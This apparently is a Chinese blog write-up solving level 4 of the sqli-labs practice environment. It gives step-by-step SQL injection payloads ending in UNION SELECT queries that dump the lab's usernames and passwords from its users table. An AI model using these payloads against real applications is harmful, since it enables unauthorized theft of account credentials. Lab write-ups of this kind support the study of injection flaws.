首页 > 数据库 >[网络安全]sqli-labs Less-4 解题详析

[网络安全]sqli-labs Less-4 解题详析

时间:2023-05-02 22:23:27浏览次数:49  
标签:详析 group Less id labs --+ GET1 order concat

判断注入类型

GET1" and "1"="1,回显如下:
在这里插入图片描述
GET1" and "1"="2
在这里插入图片描述没有回显,说明该漏洞类型为GET型双引号字符型注入

判断注入点个数

GET1" order by 3 --+
在这里插入图片描述

由上图可知,sql语法中给$id加上了()
猜测后端语句为SELECT * FROM xx where id=("$id")
故构造GET1') order by 3 --+,此时后端语句为SELECT * FROM xx where id=("1") order by 3 --+")
即SELECT * FROM xx where id=("-1") order by 3

GET1") order by 3 --+

在这里插入图片描述GET1") order by 4 --+
在这里插入图片描述故注入点为3

查库名

GET-1") union select 1,2,database(); --+
回显库名security
在这里插入图片描述

查表名

-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+

回显四个表名

在这里插入图片描述

查users表的列名

-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+

在这里插入图片描述

查字段

Payload:-1") union select 1,group_concat(username),group_concat(password) from 库名.表名; --+
实例如下:

-1") union select 1,group_concat(username),group_concat(password) from security.users; --+

在这里插入图片描述

总结

以上为[网络安全]sqli-labs Less-4 解题详析,后续将分享[网络安全]sqli-labs Less-5 解题详析
原理及姿势可参考:[网络安全]SQL注入原理及常见攻击方法简析
我是秋说,我们下次见。

标签:详析,group,Less,id,labs,--+,GET1,order,concat
From: https://www.cnblogs.com/qiushuo/p/17368426.html

相关文章

  • [网络安全]sqli-labs Less-5 解题详析
    往期sqli-labs在该博客中,读者可自行浏览。[秋说的博客](https://blog.csdn.net/2301_77485708?spm=1000.2115.3001.5343)该博客实操性较高,请读者`躬身实践`判断注入类型GET1'and'1'='1回显如下:GET1'and'1'='2没有回显,说明该漏洞类型为GET型单引号字符型注入判断注入......
  • [网络安全]DVWA之SQL注入—medium level解题详析
    免责声明:本文仅分享SQL攻击相关知识,不承担任何法律责任。本文涉及的DVWA应用程序、BurpSuite、sqlmap请读者自行安装,本文不再赘述。SQL注入原理可参考:[网络安全]SQL注入原理及常见攻击方法简析sqlmap注入方式可参考:[网络安全]以留言板项目渗透实例带你入门sqlmap提交用户名后......
  • [网络安全]DVWA之SQL注入—High level解题详析
    免责声明:本文仅分享SQL攻击相关知识,不承担任何法律责任。DVWA请读者自行安装,本文不再赘述。由于highlevel仅涉及简单攻击知识,本文不再详细解释。建议读者在理解SQL注入原理,熟悉lowlevel、mediumlevel解题姿势后再观看本文。具体原理及姿势参见:[网络安全]DVWA之SQL注入—low......
  • [网络安全]Less-1 GET - Error based - Single quotes - String:基于错误的GET单引号
    判断注入类型GET1and1=2仍有正常回显,说明该漏洞类型不是数字型注入。GET1'and'1'='2没有回显,说明该漏洞类型为字符型注入。判断注入点个数GETid=1'orderby4--+回显UnknownGETid=1'orderby3--+回显如下:说明注入点个数为3个即可构造语句如下-1'unionselect......
  • Less 相关面试题
    一、Less是什么?Less(LeanerStyleSheets的缩写)是一门向后兼容的CSS扩展语言。二、声明变量@变量名:变量值 三、less封装函数less还可以像js一样的来封装函数,需要时可以直接调用。.borderName(@px){border-radius:@px;}.box5{.borderName(10px)}......
  • xss-labs靶场
    在线XSS-labs靶场:https://xssaq.com/yx/靶场搭建靶场是直接使用docker搭建的dockerpullvulfocus/xss-labs启动靶场dockerrun-p8005:80vulfocus/xss-labs浏览器访问IP+8005windows搭建使用phpstudy_pro搭建下载地址:https://github.com/do0dl3/xss-labs解压文件......
  • 文件上传漏洞靶场:upload-labs(附在线地址)
    重装系统:CentOS7.6密钥对验证,或密码验证,根据自身情况选择,博主这边为了ssh连接方便选用的密码校验。WindTerm登录系统需提前去云服务器的安全组,开放22端口ssh连接。更新软件yumupdateyumupgradeyum升级这两个命令之间有很小的区别。yumupdate将更新您系统上的软件包,......
  • Serverless安全风险研究 - 云原生新计算范式下安全风险继承与新生
    一、Serverless背景0x1:从“硬件”到“Serverless”的变革之路在“云”的概念还没有产生之前,开发者购买物理机,并在其上部署应用程序,企业将购买的机器放置数据中心,其网络、安全配置均需要专业的技术人员管理,在这种高成本运营模式下,虚拟化技术应运而生。技术首先进化出的是虚拟机,......
  • 拥抱Serverless释放生产力,探索华为云Serverless车联网最佳实践
    华为云Serverless车联网场景解决方案,以FunctionGraph为核心的Serverless化组合方案,使用FunctionGraph、OBS、DIS等技术,可以实现架构的灵活扩展,在出行高峰期可以自动扩展满足系统的性能要求,在空闲时段则能够缩减规模,降低成本。帮助企业减少运维成本、加速业务上线速度。车联网场景......
  • 在js中修改less文件内样式
    title:"在js中修改less文件内样式"date:2023-04-21T22:51:58+08:00tags:["React","less","JavaScript"]categories:["前端篇"]在项目中使用使用进度条时遇到了一点问题,根据需求进度条的百分比需要在条内显示,但是当完成度太低时由于进度条背景和百分比值都是接近的颜......